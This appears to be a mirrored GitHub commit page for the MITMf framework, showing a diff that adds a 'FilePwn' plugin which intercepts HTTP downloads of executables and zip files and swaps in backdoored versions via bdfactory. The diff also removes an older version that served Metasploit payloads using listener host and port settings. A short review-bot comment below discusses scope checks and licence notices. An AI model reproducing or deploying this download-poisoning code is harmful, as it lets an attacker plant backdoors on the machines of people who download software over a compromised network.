mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 05:22:15 -07:00
filepwn test plugin
parent
90c5b8ac95
commit
17478c17b6
2 changed files with 42 additions and 51 deletions
|
@ -1,37 +1,3 @@
|
||||||
[Overall]
|
|
||||||
transparentProxy = True # Must for transparent proxy
|
|
||||||
MaxSizeFileRequested = 100000000 # will send a 502 request of large content to the client (server error)
|
|
||||||
certLocation = ~/.mitmproxy/mitmproxy-ca.pem
|
|
||||||
proxyPort = 8080
|
|
||||||
sslports = 443, 8443
|
|
||||||
loglevel = INFO
|
|
||||||
logname = proxy.log
|
|
||||||
resourceScript = bdfproxy_msf_resource.rc
|
|
||||||
|
|
||||||
|
|
||||||
[hosts]
|
|
||||||
#whitelist host/IP - patch these only.
|
|
||||||
#ALL is everything, use the blacklist to leave certain hosts/IPs out
|
|
||||||
|
|
||||||
whitelist = ALL
|
|
||||||
|
|
||||||
#Hosts that are never patched, but still pass through the proxy. You can include host and ip, recommended to do both.
|
|
||||||
|
|
||||||
blacklist = , # a comma is null do not leave blank
|
|
||||||
|
|
||||||
|
|
||||||
[keywords]
|
|
||||||
#These checks look at the path of a url for keywords
|
|
||||||
|
|
||||||
whitelist = ALL
|
|
||||||
|
|
||||||
#For blacklist note binaries that you do not want to touch at all
|
|
||||||
|
|
||||||
# Also applied in zip files
|
|
||||||
|
|
||||||
blacklist = Tcpview.exe, skype.exe, .dll
|
|
||||||
|
|
||||||
|
|
||||||
[ZIP]
|
[ZIP]
|
||||||
# patchCount is the max number of files to patch in a zip file
|
# patchCount is the max number of files to patch in a zip file
|
||||||
# After the max is reached it will bypass the rest of the files
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
|
|
@ -1,6 +1,21 @@
|
||||||
import os,subprocess,logging,time
|
################################################################################################
|
||||||
from bdfproxy.bdf_proxy import *
|
# 99.9999999% of this code is stolen from BDFProxy - https://github.com/secretsquirrel/BDFProxy
|
||||||
exe_mimetypes = ['application/octet-stream', 'application/x-msdownload', 'application/exe', 'application/x-exe', 'application/dos-exe', 'vms/exe', 'application/x-winexe', 'application/msdos-windows', 'application/x-msdos-program']
|
#
|
||||||
|
# This is just a test to see if i can actually implement it correctly!! NOT THE FINAL VERSION!!!!
|
||||||
|
#################################################################################################
|
||||||
|
|
||||||
|
import sys, os
|
||||||
|
import pefile
|
||||||
|
import zipfile
|
||||||
|
from bdfactory import pebin, elfbin
|
||||||
|
from tempfile import mkstemp
|
||||||
|
|
||||||
|
|
||||||
|
# for now lets not read from a config file
|
||||||
|
#try:
|
||||||
|
#from configobj import ConfigObj
|
||||||
|
#except:
|
||||||
|
#sys.exit('[-] configobj not installed!')
|
||||||
|
|
||||||
class FilePwn(Plugin):
|
class FilePwn(Plugin):
|
||||||
name = "FilePwn"
|
name = "FilePwn"
|
||||||
|
@ -8,17 +23,21 @@ class FilePwn(Plugin):
|
||||||
implements = ["handleResponse"]
|
implements = ["handleResponse"]
|
||||||
has_opts = True
|
has_opts = True
|
||||||
log_level = logging.DEBUG
|
log_level = logging.DEBUG
|
||||||
desc = "Backdoor executables being sent over http using bdfproxy"
|
desc = "Backdoor executables being sent over http using bdfactory (STILL WORK IN PROGRESS!!)"
|
||||||
|
|
||||||
def initialize(self,options):
|
def initialize(self,options):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
|
|
||||||
|
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
|
||||||
|
'application/x-msdos-program', 'binary/octet-stream']
|
||||||
|
#FOR FUTURE USE
|
||||||
|
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
||||||
|
|
||||||
|
#USED NOW
|
||||||
|
self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
||||||
|
|
||||||
self.options = options
|
self.options = options
|
||||||
self.msf_file_payload_opts = "LHOST=%s LPORT=%s" % \
|
#userConfig = ConfigObj('bdfproxy.cfg')
|
||||||
(options.msf_lhost,options.msf_file_lport)
|
|
||||||
self.payloads = {}
|
|
||||||
self._make_files()
|
|
||||||
if options.launch_msf_listener and options.msf_rc == "/tmp/tmp.rc":
|
|
||||||
self._start_msf()
|
|
||||||
|
|
||||||
def binaryGrinder(self, binaryFile):
|
def binaryGrinder(self, binaryFile):
|
||||||
"""
|
"""
|
||||||
|
@ -230,13 +249,19 @@ class FilePwn(Plugin):
|
||||||
return aZipFile
|
return aZipFile
|
||||||
|
|
||||||
def handleResponse(self,request,data):
|
def handleResponse(self,request,data):
|
||||||
#print "http://" + request.client.getRequestHostname() + request.uri
|
|
||||||
ch = request.client.headers['Content-Type']
|
content_header = request.client.headers['Content-Type']
|
||||||
#print ch
|
|
||||||
if ch in self.payloads:
|
if content_header in self.binaryMimeTypes:
|
||||||
print "Replaced file of mimtype %s with malicious version" % ch
|
orig_binary = request.content.read()
|
||||||
data = self.payloads[ch]
|
bd_binary = self.binaryGrinder(orig_binary)
|
||||||
return {'request':request,'data':data}
|
return {'request':request,'data':bd_binary}
|
||||||
|
|
||||||
|
elif content_header in self.zipMimeTypes:
|
||||||
|
orig_zipfile = request.content.read()
|
||||||
|
bd_zip = self.zip_files(orig_zipfile)
|
||||||
|
return {'request':request,'data':bd_zip}
|
||||||
|
|
||||||
else:
|
else:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|
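Review bot: Host and keyword scoping is missing from the new `handleResponse`: both the `binaryMimeTypes` and `zipMimeTypes` branches act on any response with a matching `Content-Type`, and no whitelist or blacklist check is visible in front of them. The other file in this commit appears to drop the `[hosts]` and `[keywords]` whitelist/blacklist settings, and the config load is commented out (`#userConfig = ConfigObj('bdfproxy.cfg')`), so nothing shown here keeps out-of-scope hosts untouched during an authorized test, unless `binaryGrinder` or `zip_files`, whose bodies are outside the hunk, enforce it. I would put the scope check ahead of both branches and mark the gap until the config is read again, e.g. `# TODO: re-apply [hosts]/[keywords] whitelist and blacklist before touching any response`. The header comment saying the code comes from BDFProxy should also carry the upstream copyright and licence notice, not only the URL.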